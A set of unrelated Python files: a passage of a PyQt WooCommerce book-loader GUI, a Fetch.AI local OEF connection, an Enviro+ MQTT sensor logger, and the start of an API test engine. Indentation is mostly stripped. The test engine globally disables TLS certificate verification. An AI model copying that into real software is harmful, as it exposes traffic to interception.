worker = Worker(self.word)
self.threadpool.start(worker)
worker.signals.finished.connect(lambda: self.update_info_label.setText(self.message)) # pylint: disable=(line-too-long)
self.clear_line_edit()
self.load_button.setDisabled(True)
self.next_desc_button.setDisabled(True)
self.previous_desc_button.setDisabled(True)
except Exception as error: # pylint: disable=broad-except
print("\nSend to wordpress method: \n",error)
logger.info(error)
def word(self,progress_callback):
''' Worker to send product to Woocommerce '''
progress_callback.emit()
try:
self.post_product = woo(self.woocommerce_dict) # pylint: disable=(attribute-defined-outside-init)
if self.post_product['source']:
self.message = "Produkt został zaktualizowany" # pylint: disable=(attribute-defined-outside-init)
else:
self.message = "Dodano nowy produkt" # pylint: disable=(attribute-defined-outside-init)
except Exception as error: # pylint: disable=broad-except
print("\nWord method:\n",error)
logger.info(error)
def get_image_list(self):
""" Merge image list """
try:
for dictionary in self.dictionary['image']:
for links in dictionary.values():
self.image_list += links
            # drop missing links without mutating the list while iterating over it
            self.image_list = [link for link in self.image_list if link is not None]
self.image_list = list(set(self.image_list))
print(self.image_list)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def next_image(self):
""" Next image from list """
try:
if len(self.image_list) > 1:
self.image_iterator += 1
if len(self.image_list) == self.image_iterator:
self.image_iterator = 0
self.dictionary["image"] = get_image(self.image_list[self.image_iterator], self.item) # pylint: disable=(line-too-long)
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def previous_image(self):
""" Previous image from list """
try:
if len(self.image_list) > 1:
self.image_iterator -= 1
if self.image_iterator == -1:
self.image_iterator = len(self.image_list) -1
self.dictionary["image"] = get_image(self.image_list[self.image_iterator], self.item) # pylint: disable=(line-too-long)
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def change_image(self):
''' Change image button method '''
try:
image_folder = self.config.get("General", "image_folder")
image_path = os.path.join(self.current_dir, image_folder)
image = os.path.join(image_path, str(self.item)+".jpg")
self.fileName, _ = QtWidgets.QFileDialog.getOpenFileName(None, "Open File", "",'Images (*.png *.xpm *.jpg)', options=self.options) # pylint: disable=(c-extension-no-member),(attribute-defined-outside-init),(line-too-long)
print(str(self.fileName))
try:
shutil.copy2(self.fileName, image)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
self.dictionary['image'] = image
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def clear_line_edit(self):
''' Clear edit lines method'''
try:
self.isbn_line.clear()
self.title_line.clear()
self.author_line.clear()
self.publisher_line.clear()
self.year_line.clear()
self.amount_line.clear()
self.price_line.clear()
self.description_text_edit.clear()
self.name_line.clear()
self.category_line.clear()
self.cover_image_label.clear()
self.source_label.clear()
self.progress_bar.setValue(0)
self.id_line.clear()
self.sale_price_line.clear()
self.image_size_label.clear()
self.save_to_file_button.setDisabled(True)
self.word_press_button.setDisabled(True)
self.isbn_line.setFocus()
self.sale_check_box.setChecked(False)
self.release_check_box.setChecked(False)
self.gift_check_box.setChecked(False)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def save_item(self):
''' Save to file method '''
self.category_exist() # Start function to check category from header list
self.get_dictionary()
self.dictionary_to_save['image'] = (self.isbn_line.text())
try:
self.fileNameSave, _ = QtWidgets.QFileDialog.getSaveFileName(None,"Open File", "","All Files (*)", options=self.options) # pylint: disable=(attribute-defined-outside-init),(c-extension-no-member)(line-too-long)
            self.fileNameSave, self.fileNameSave_extension = os.path.splitext(self.fileNameSave) # pylint: disable=(attribute-defined-outside-init)
            if not self.fileNameSave:  # the save dialog was cancelled
                return
if self.fileNameSave_extension == '.txt': # pylint: disable=(attribute-defined-outside-init)
self.save_item_txt()
else:
self.fileNameSave_extension = ".csv" # pylint: disable=(attribute-defined-outside-init)
self.save_item_csv()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
self.isbn_line.setFocus()
# Save to csv method
def save_item_csv(self):
''' Save to .csv '''
try:
with open(self.fileNameSave + self.fileNameSave_extension, 'w',encoding=None) as f:
w = csv.DictWriter(f, self.dictionary_to_save.keys())
w.writeheader()
w.writerow(self.dictionary_to_save)
if not len(self.fileNameSave) == 0:
self.clear_line_edit()
self.update_info_label.setText("File saved")
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
# Save to txt method
def save_item_txt(self):
''' Save to .txt '''
try:
with io.open(self.fileNameSave + self.fileNameSave_extension, 'w',encoding=None) as f:
f.write(json.dumps(self.dictionary_to_save))
self.clear_line_edit()
self.update_info_label.setText("File saved")
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
# Open settings button method
def open_settings(self):
''' Open settings method '''
self.settings_window = QtWidgets.QDialog() # pylint: disable=(attribute-defined-outside-init),(c-extension-no-member)
self.settings_window.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member, line-too-long)
self.settings_ui = Ui_Settings() # pylint: disable=(attribute-defined-outside-init)
self.settings_ui.setupUi(self.settings_window)
# Set Parser for config.ini
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'config', 'conf.ini'))
self.settings_ui.isbndb_check_box.setChecked(util.strtobool(config.get('Source', 'isbndb')))
self.settings_ui.google_check_box.setChecked(util.strtobool(config.get('Source', 'google')))
self.settings_ui.amazon_check_box.setChecked(util.strtobool(config.get('Source', 'amazon')))
self.settings_ui.goodreads_check_box.setChecked(util.strtobool(config.get('Source', 'goodreads'))) # pylint: disable=(line-too-long)
for radio in self.settings_ui.list_of_radio:
if config.get('Validator', 'priority') in radio.text().lower():
radio.setChecked(True)
self.settings_window.show()
# Get header category list from .ini file
def categories_main_list(self):
''' Category list '''
try:
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'config', 'conf.ini'))
self.category_completer_list = ast.literal_eval(config.get("Category", "categories"))
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
return self.category_completer_list
# Check category button method
def category_exist(self):
''' Compare category list '''
self.category_to_save = [] # pylint:disable=(attribute-defined-outside-init)
try:
self.cat = self.category_line.text().split(',') # pylint: disable=(attribute-defined-outside-init)
            for i in self.cat:
                i = i.strip()
                if i in self.category_completer_list:
                    self.category_to_save.append(i)
self.category_line.setText(",".join(self.category_to_save))
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
return self.category_to_save
def closeEvent(self, event):
''' Close event method '''
reply = QtWidgets.QMessageBox.question(self, 'Close window', # pylint: disable=(c-extension-no-member)
'Are you sure you want to close the window?',
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No) # pylint: disable=(c-extension-no-member)
if reply == QtWidgets.QMessageBox.Yes: # pylint: disable=(c-extension-no-member)
event.accept()
print('Window closed')
cache = pathlib.Path(os.path.join(self.current_dir, "cache"))
if cache.exists() and cache.is_dir():
shutil.rmtree(cache)
else:
event.ignore()
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv) # pylint: disable=(c-extension-no-member)
    main_window = MyMainWindow()
    main_window.show()
sys.exit(app.exec_())
|
connection.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Extension to the Local Node."""
import asyncio
import copy
import logging
from asyncio import AbstractEventLoop, Queue
from collections import defaultdict
from threading import Thread
from typing import Dict, List, Optional, Tuple, cast
from aea.configurations.base import ProtocolId, PublicId
from aea.connections.base import Connection, ConnectionStates
from aea.helpers.search.models import Description
from aea.mail.base import AEAConnectionError, Address, Envelope
from aea.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.oef_search.dialogues import (
OefSearchDialogue,
OefSearchDialogues,
)
from packages.fetchai.protocols.oef_search.message import OefSearchMessage
_default_logger = logging.getLogger("aea.packages.fetchai.connections.local")
TARGET = 0
MESSAGE_ID = 1
RESPONSE_TARGET = MESSAGE_ID
RESPONSE_MESSAGE_ID = MESSAGE_ID + 1
STUB_DIALOGUE_ID = 0
PUBLIC_ID = PublicId.from_str("fetchai/local:0.6.0")
class LocalNode:
"""A light-weight local implementation of a OEF Node."""
def __init__(
self, loop: AbstractEventLoop = None, logger: logging.Logger = _default_logger
):
"""
Initialize a local (i.e. non-networked) implementation of an OEF Node.
:param loop: the event loop. If None, a new event loop is instantiated.
"""
self.services = defaultdict(lambda: []) # type: Dict[str, List[Description]]
self._lock = asyncio.Lock()
self._loop = loop if loop is not None else asyncio.new_event_loop()
self._thread = Thread(target=self._run_loop, daemon=True)
self._in_queue = asyncio.Queue(loop=self._loop) # type: asyncio.Queue
self._out_queues = {} # type: Dict[str, asyncio.Queue]
self._receiving_loop_task = None # type: Optional[asyncio.Task]
self.address: Optional[Address] = None
self._dialogues: Optional[OefSearchDialogues] = None
self.logger = logger
def __enter__(self):
"""Start the local node."""
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Stop the local node."""
self.stop()
def _run_loop(self):
"""
Run the asyncio loop.
This method is supposed to be run only in the Multiplexer thread.
"""
self.logger.debug("Starting threaded asyncio loop...")
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
self.logger.debug("Asyncio loop has been stopped.")
async def connect(
self, address: Address, writer: asyncio.Queue
) -> Optional[asyncio.Queue]:
"""
Connect an address to the node.
:param address: the address of the agent.
:param writer: the queue where the client is listening.
:return: an asynchronous queue, that constitutes the communication channel.
"""
if address in self._out_queues.keys():
return None
assert self._in_queue is not None
q = self._in_queue # type: asyncio.Queue
self._out_queues[address] = writer
self.address = address
self._dialogues = OefSearchDialogues(
agent_address=str(OEFLocalConnection.connection_id)
)
return q
def start(self):
"""Start the node."""
if not self._loop.is_running() and not self._thread.is_alive():
self._thread.start()
self._receiving_loop_task = asyncio.run_coroutine_threadsafe(
self.receiving_loop(), loop=self._loop
)
self.logger.debug("Local node has been started.")
def stop(self):
"""Stop the node."""
asyncio.run_coroutine_threadsafe(self._in_queue.put(None), self._loop).result()
self._receiving_loop_task.result()
if self._loop.is_running():
self._loop.call_soon_threadsafe(self._loop.stop)
if self._thread.is_alive():
self._thread.join()
async def receiving_loop(self):
"""Process incoming messages."""
while True:
envelope = await self._in_queue.get()
if envelope is None:
self.logger.debug("Receiving loop terminated.")
return
self.logger.debug("Handling envelope: {}".format(envelope))
await self._handle_envelope(envelope)
async def _handle_envelope(self, envelope: Envelope) -> None:
"""Handle an envelope.
:param envelope: the envelope
:return: None
"""
if envelope.protocol_id == ProtocolId.from_str("fetchai/oef_search:0.4.0"):
await self._handle_oef_message(envelope)
else:
await self._handle_agent_message(envelope)
async def _handle_oef_message(self, envelope: Envelope) -> None:
"""Handle oef messages.
:param envelope: the envelope
:return: None
"""
assert isinstance(
envelope.message, OefSearchMessage
), "Message not of type OefSearchMessage"
oef_message, dialogue = self._get_message_and_dialogue(envelope)
if dialogue is None:
self.logger.warning(
"Could not create dialogue for message={}".format(oef_message)
)
return
if oef_message.performative == OefSearchMessage.Performative.REGISTER_SERVICE:
await self._register_service(
envelope.sender, oef_message.service_description
)
elif (
oef_message.performative == OefSearchMessage.Performative.UNREGISTER_SERVICE
):
await self._unregister_service(oef_message, dialogue)
elif oef_message.performative == OefSearchMessage.Performative.SEARCH_SERVICES:
await self._search_services(oef_message, dialogue)
else:
# request not recognized
pass
async def _handle_agent_message(self, envelope: Envelope) -> None:
"""
Forward an envelope to the right agent.
:param envelope: the envelope
:return: None
"""
destination = envelope.to
if destination not in self._out_queues.keys():
msg = DefaultMessage(
performative=DefaultMessage.Performative.ERROR,
dialogue_reference=("", ""),
target=TARGET,
message_id=MESSAGE_ID,
error_code=DefaultMessage.ErrorCode.INVALID_DIALOGUE,
error_msg="Destination not available",
error_data={}, # TODO: reference incoming message.
)
error_envelope = Envelope(
to=envelope.sender,
sender=str(OEFLocalConnection.connection_id),
protocol_id=DefaultMessage.protocol_id,
message=msg,
)
await self._send(error_envelope)
return
else:
await self._send(envelope)
async def _register_service(
self, address: Address, service_description: Description
):
"""
Register a service agent in the service directory of the node.
:param address: the address of the service agent to be registered.
:param service_description: the description of the service agent to be registered.
:return: None
"""
async with self._lock:
self.services[address].append(service_description)
async def _unregister_service(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Unregister a service agent.
:param oef_search_msg: the incoming message.
:param dialogue: the dialogue.
:return: None
"""
service_description = oef_search_msg.service_description
address = oef_search_msg.sender
async with self._lock:
if address not in self.services:
msg = OefSearchMessage(
performative=OefSearchMessage.Performative.OEF_ERROR,
target=oef_search_msg.message_id,
message_id=oef_search_msg.message_id + 1,
oef_error_operation=OefSearchMessage.OefErrorOperation.UNREGISTER_SERVICE,
dialogue_reference=dialogue.dialogue_label.dialogue_reference,
)
msg.counterparty = oef_search_msg.sender
assert dialogue.update(msg)
envelope = Envelope(
to=msg.counterparty,
sender=msg.sender,
protocol_id=msg.protocol_id,
message=msg,
)
await self._send(envelope)
else:
self.services[address].remove(service_description)
if len(self.services[address]) == 0:
self.services.pop(address)
async def _search_services(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Search the agents in the local Service Directory, and send back the result.
        This is actually a dummy search: it returns all the registered agents with the specified data model.
If the data model is not specified, it will return all the agents.
:param oef_search_msg: the message.
:param dialogue: the dialogue.
:return: None
"""
async with self._lock:
query = oef_search_msg.query
result = [] # type: List[str]
if query.model is None:
result = list(set(self.services.keys()))
else:
for agent_address, descriptions in self.services.items():
for description in descriptions:
if description.data_model == query.model:
result.append(agent_address)
msg = OefSearchMessage(
performative=OefSearchMessage.Performative.SEARCH_RESULT,
target=oef_search_msg.message_id,
dialogue_reference=dialogue.dialogue_label.dialogue_reference,
message_id=oef_search_msg.message_id + 1,
agents=tuple(sorted(set(result))),
)
msg.counterparty = oef_search_msg.sender
assert dialogue.update(msg)
envelope = Envelope(
to=msg.counterparty,
sender=msg.sender,
protocol_id=msg.protocol_id,
message=msg,
)
await self._send(envelope)
def _get_message_and_dialogue(
self, envelope: Envelope
) -> Tuple[OefSearchMessage, Optional[OefSearchDialogue]]:
"""
Get a message copy and dialogue related to this message.
:param envelope: incoming envelope
        :return: Tuple[Message, Optional[Dialogue]]
"""
assert self._dialogues is not None, "Call connect before!"
message_orig = cast(OefSearchMessage, envelope.message)
message = copy.copy(
message_orig
) # TODO: fix; need to copy atm to avoid overwriting "is_incoming"
message.is_incoming = True # TODO: fix; should be done by framework
message.counterparty = (
message_orig.sender
) # TODO: fix; should be done by framework
dialogue = cast(OefSearchDialogue, self._dialogues.update(message))
return message, dialogue
async def _send(self, envelope: Envelope):
"""Send a message."""
destination = envelope.to
destination_queue = self._out_queues[destination]
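        # The destination queue is bound to the receiving connection's own event loop,
        # so hand the envelope over via that loop's call_soon_threadsafe rather than
        # awaiting put() from the node's loop.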
destination_queue._loop.call_soon_threadsafe(destination_queue.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
self.logger.debug("Send envelope {}".format(envelope))
async def disconnect(self, address: Address) -> None:
"""
Disconnect.
:param address: the address of the agent
:return: None
"""
async with self._lock:
self._out_queues.pop(address, None)
self.services.pop(address, None)
class OEFLocalConnection(Connection):
"""
Proxy to the functionality of the OEF.
It allows the interaction between agents, but not the search functionality.
It is useful for local testing.
"""
connection_id = PUBLIC_ID
def __init__(self, local_node: Optional[LocalNode] = None, **kwargs):
"""
Load the connection configuration.
Initialize a OEF proxy for a local OEF Node
:param local_node: the Local OEF Node object. This reference must be the same across the agents of interest. (Note, AEA loader will not accept this argument.)
"""
super().__init__(**kwargs)
self._local_node = local_node
self._reader = None # type: Optional[Queue]
self._writer = None # type: Optional[Queue]
async def connect(self) -> None:
"""Connect to the local OEF Node."""
assert self._local_node is not None, "No local node set!"
if self.is_connected:
return # pragma: nocover
self._state.set(ConnectionStates.connecting)
self._reader = Queue()
self._writer = await self._local_node.connect(self.address, self._reader)
self._state.set(ConnectionStates.connected)
async def disconnect(self) -> None:
"""Disconnect from the local OEF Node."""
assert self._local_node is not None, "No local node set!"
if self.is_disconnected:
return # pragma: nocover
self._state.set(ConnectionStates.disconnecting)
assert self._reader is not None
await self._local_node.disconnect(self.address)
await self._reader.put(None)
self._reader, self._writer = None, None
self._state.set(ConnectionStates.disconnected)
async def send(self, envelope: Envelope):
"""Send a message."""
if not self.is_connected:
raise AEAConnectionError(
"Connection not established yet. Please use 'connect()'."
)
self._writer._loop.call_soon_threadsafe(self._writer.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
async def receive(self, *args, **kwargs) -> Optional["Envelope"]:
"""
Receive an envelope. Blocking.
:return: the envelope received, or None.
"""
if not self.is_connected:
raise AEAConnectionError(
"Connection not established yet. Please use 'connect()'."
)
try:
assert self._reader is not None
envelope = await self._reader.get()
if envelope is None:
self.logger.debug("Receiving task terminated.")
return None
self.logger.debug("Received envelope {}".format(envelope))
return envelope
except Exception: # pragma: nocover # pylint: disable=broad-except
return None
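# Hedged usage sketch (added, not part of this module): agents under test share one
# LocalNode, whose context-manager protocol starts and stops the background asyncio
# loop; each agent then wraps it in an OEFLocalConnection. The remaining constructor
# kwargs come from the AEA loader and are deliberately elided here:
#
#     with LocalNode() as node:
#         connection = OEFLocalConnection(local_node=node, ...)
#         # await connection.connect() / connection.send(envelope) / connection.receive()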
|
logger.py
|
import collections
import threading
import traceback
import json
from subprocess import PIPE, Popen, check_output
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from enviroplus import gas
from pms5003 import PMS5003
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix,
use_pms5003, room, num_samples):
self.bme280 = BME280()
self.client_id = client_id
self.prefix = prefix
self.room = room
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
self.use_pms5003 = use_pms5003
if self.use_pms5003:
self.pm_thread = threading.Thread(
target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
        If the sensor is not polled continuously, then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"pm10": pm_data.pm_ug_per_m3(
1.0), #, atmospheric_environment=True),
"pm25": pm_data.pm_ug_per_m3(
2.5), #, atmospheric_environment=True),
"pm100": pm_data.pm_ug_per_m3(
10), #, atmospheric_environment=True),
}
            except Exception:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def remove_sensor_config(self):
"""
        Remove the config topic previously created for each sensor
"""
print("removed")
sensors = [
"proximity",
"lux",
"temperature",
"pressure",
"humidity",
"oxidising",
"reducing",
"nh3",
"pm10",
"pm25",
"pm100",
]
for sensor in sensors:
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, '')
def sensor_config(self):
"""
Create config topic for each sensor
"""
# homeassistant/sensor/livingRoom/temperature/config
# homeassistant/sensor/livingRoom/temperature/state
# homeassistant/livingroom/enviroplus/state
sensors = {
"proximity": {
"unit_of_measurement": "cm",
"value_template": "{{ value_json }}"
},
"lux": {
"device_class": "illuminance",
"unit_of_measurement": "lx",
"value_template": "{{ value_json }}",
"icon": "mdi:weather-sunny"
},
"temperature": {
"device_class": "temperature",
"unit_of_measurement": "°C",
"value_template": "{{ value_json }}",
"icon": "mdi:thermometer"
},
"pressure": {
"device_class": "pressure",
"unit_of_measurement": "hPa",
"value_template": "{{ value_json }}",
"icon": "mdi:arrow-down-bold"
},
"humidity": {
"device_class": "humidity",
"unit_of_measurement": "%H",
"value_template": "{{ value_json }}",
"icon": "mdi:water-percent"
},
"oxidising": {
"unit_of_measurement": "no2",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"reducing": {
"unit_of_measurement": "CO",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"nh3": {
"unit_of_measurement": "nh3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
}
if self.use_pms5003:
sensors["pm10"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm25"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm100"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
try:
for sensor in sensors:
sensors[sensor]["name"] = f"{self.room} {sensor.capitalize()}"
sensors[sensor][
"state_topic"] = f"{self.prefix}/sensor/{self.room}/{sensor}/state"
sensors[sensor]["unique_id"] = f"{sensor}-{self.client_id}"
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, json.dumps(sensors[sensor]))
print("Configs added")
        except Exception:
print("Failed to add configs.")
traceback.print_exc()
# Get CPU temperature to use for compensation
def get_cpu_temperature(self):
process = Popen(["vcgencmd", "measure_temp"],
stdout=PIPE,
universal_newlines=True)
output, _error = process.communicate()
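        # output looks like "temp=47.2'C\n"; slice out the number between '=' and "'"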
return float(output[output.index("=") + 1:output.rindex("'")])
def take_readings(self):
# Tuning factor for compensation. Decrease this number to adjust the
# temperature down, and increase to adjust up
temp_comp_factor = 1.7
cpu_temp = self.get_cpu_temperature()
raw_temp = self.bme280.get_temperature() # float
comp_temp = raw_temp - ((cpu_temp - raw_temp) / temp_comp_factor)
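        # Worked example (added): with cpu_temp = 55.0 and raw_temp = 32.0 the reading
        # is lowered by (55.0 - 32.0) / 1.7 ≈ 13.5 °C, giving roughly 18.5 °C.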
hum_comp_factor = 1.3
gas_data = gas.read_all()
readings = {
"proximity": ltr559.get_proximity(),
"lux": int(ltr559.get_lux()),
"temperature": round(comp_temp, 1),
"pressure": round(int(self.bme280.get_pressure() * 100),
-1), # round to nearest 10
"humidity":
round(int(self.bme280.get_humidity() * hum_comp_factor), 1),
"oxidising": int(gas_data.oxidising / 1000),
"reducing": int(gas_data.reducing / 1000),
"nh3": int(gas_data.nh3 / 1000),
}
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value))
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
value_sum = sum([d[topic] for d in self.samples])
value_avg = round(value_sum / len(self.samples), 1)
#print(topic, value_avg)
self.publish(f"sensor/{self.room}/{topic}/state", value_avg)
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
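# Hedged usage sketch (added): a minimal polling loop. The broker address, credentials
# and topic prefix below are placeholder assumptions; the project's real entrypoint
# lives in a separate script.
if __name__ == "__main__":
    import time

    env_logger = EnvLogger(
        client_id="enviro-example",
        host="localhost", port=1883,
        username="user", password="pass",
        prefix="homeassistant",
        use_pms5003=False,
        room="livingRoom",
        num_samples=5,
    )
    env_logger.sensor_config()      # publish Home Assistant discovery configs
    try:
        while True:
            env_logger.update()     # sample, average over the window, publish
            time.sleep(5)
    finally:
        env_logger.destroy()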
|
execution.py
|
import ast
import json
import re
import ssl
import time
from datetime import datetime
from multiprocessing import Pool
from threading import Thread
import pytz
import requests
from bson import ObjectId
from flask import current_app
from requests.cookies import RequestsCookieJar
from app import app
from config import Config
from controllers.mail import get_mails_by_group
from controllers.mail_sender import send_cron_email
from controllers.temp_cookies import save_cookies_for_suite, get_cookies_by_suite
from controllers.temp_suite_params import save_temp_params_for_suite, get_temp_params_by_suite
from controllers.test_env_param import get_global_env_vars
from controllers.test_plan_report import save_plan_report
from controllers.test_report import save_report_detail, save_report
from controllers.test_suite import get_suite_name
from execution_engine.data_initialize.handler import execute_data_init
from models.plan import Plan
from models.test_case import TestCase
from models.test_suite import TestSuite
from utils import common
from utils import send_notify
from utils import fake
# possibly unnecessary: globally disable strict HTTPS certificate verification
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings()
test_conclusion = {
0: "pass",
1: "failed",
2: "error",
3: "notRun"
}
config = Config()
host_ip = config.get_host()
host_port = config.get_port()
def get_case_list_by_suite(test_suite_id, include_forbidden=False):
returned_case_list = []
sort_query = [('sequence', 1), ('createAt', 1)]
if test_suite_id:
if include_forbidden:
find_query = {
'testSuiteId': ObjectId(test_suite_id),
'isDeleted': {'$ne': True}
}
else:
find_query = {
'testSuiteId': ObjectId(test_suite_id),
'isDeleted': {'$ne': True},
'status': True
}
for test_case in TestCase.find(find_query).sort(sort_query):
test_case_dict = common.format_response_in_dic(test_case)
if 'lastManualResult' in test_case_dict:
test_case_dict.pop('lastManualResult')
returned_case_list.append(test_case_dict)
return returned_case_list
# Asynchronous decorator: run the wrapped function in a background thread
def async_test(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
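# Added note: functions wrapped with @async_test run on a new Thread and the call
# returns immediately; the wrapper discards both the thread handle and the return
# value, so it only suits fire-and-forget work, e.g.
#
#     @async_test
#     def run_suite_async(suite_id):
#         ...  # long-running execution whose results are persisted elsewhere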
# Base test class: it collects a test case's parameters, request and validation settings, runs the test,
# and returns {'status': 'ok'} when the case passes or {'status': 'failed'} when it does not.
class ExecutionEngine:
def __init__(self, protocol, domain, test_env_id=None, global_env_vars=None, test_result_list=None, max_retries=5,
global_suite_vars=None):
self.test_env_id = test_env_id
self.protocol = protocol
self.domain = domain
self.session = requests.Session()
if isinstance(max_retries, int) and max_retries > 0:
            # configure connection retries
adapters = requests.adapters.HTTPAdapter(max_retries=max_retries)
self.session.mount('https://', adapters)
self.session.mount('http://', adapters)
self.test_result_list = test_result_list
self.global_vars = {}
if global_env_vars is not None:
if not isinstance(global_env_vars, dict):
raise ValueError('global_env_vars must be a dict!')
self.global_vars.update(global_env_vars)
if global_suite_vars is not None:
if not isinstance(global_suite_vars, dict):
raise ValueError('global_suite_vars must be a dict!')
self.global_vars.update(global_suite_vars)
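        # note: suite-level variables are applied after the environment-level ones,
        # so they take precedence when names collide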
def execute_single_case_test(self, test_case, is_debug=False):
returned_data = dict()
returned_data["_id"] = ObjectId(test_case["_id"])
returned_data["testConclusion"] = []
        # stores the processed testCaseDetail
returned_data["testCaseDetail"] = {}
if not isinstance(test_case, dict):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(2), 'reason': "测试用例结构不正确"})
return returned_data
def validate_test_case(case):
required_key_list = ['route', 'requestMethod']
return all([required_key in case for required_key in required_key_list])
if not validate_test_case(test_case):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(2), 'reason': "接口必要参数不完整"})
return returned_data
if test_case.get('isClearCookie'):
self.session.cookies.clear()
session = self.session
request_url = None
request_method = None
request_headers = dict()
request_body = None
check_response_code = None
check_spend_seconds = None
check_response_body = None
check_response_number = None
set_global_vars = None # for example {'user': 'user1'}
temp_suite_params = dict()
new_temp_suite_params = dict()
        # for a debug run, the temporary suite variables need to be fetched first
if is_debug:
if 'testSuiteId' in test_case and test_case["testSuiteId"]:
temp_suite_params = get_temp_params_by_suite(test_case["testSuiteId"])
if temp_suite_params:
self.global_vars.update(temp_suite_params)
        # resolve the request protocol
if 'requestProtocol' in test_case and isinstance(test_case["requestProtocol"], str) \
and (test_case["requestProtocol"] == 'HTTP' or test_case["requestProtocol"] == 'HTTPS'):
protocol = test_case["requestProtocol"]
else:
protocol = self.protocol
        # resolve the request domain
if 'domain' in test_case and isinstance(test_case["domain"], str) and not test_case["domain"].strip() == '':
domain = test_case["domain"]
else:
domain = self.domain
        # substitute ${service} in the domain (if present)
if 'service' in test_case and isinstance(test_case["service"], str) \
and not test_case["service"].strip() == '':
domain = common.replace_global_var_for_str(init_var_str=domain,
global_var_dic={'service': test_case["service"]})
domain = common.replace_global_var_for_str(init_var_str=domain,
global_var_dic=self.global_vars)
        # build the URL: protocol + domain + route
route = common.replace_global_var_for_str(init_var_str=test_case['route'], global_var_dic=self.global_vars) \
if isinstance(test_case['route'], str) else test_case['route']
request_url = '%s://%s%s' % (protocol.lower(), domain, route)
returned_data['testCaseDetail']['url'] = request_url
        # request method
request_method = test_case['requestMethod']
returned_data['testCaseDetail']['requestMethod'] = request_method
        # process headers
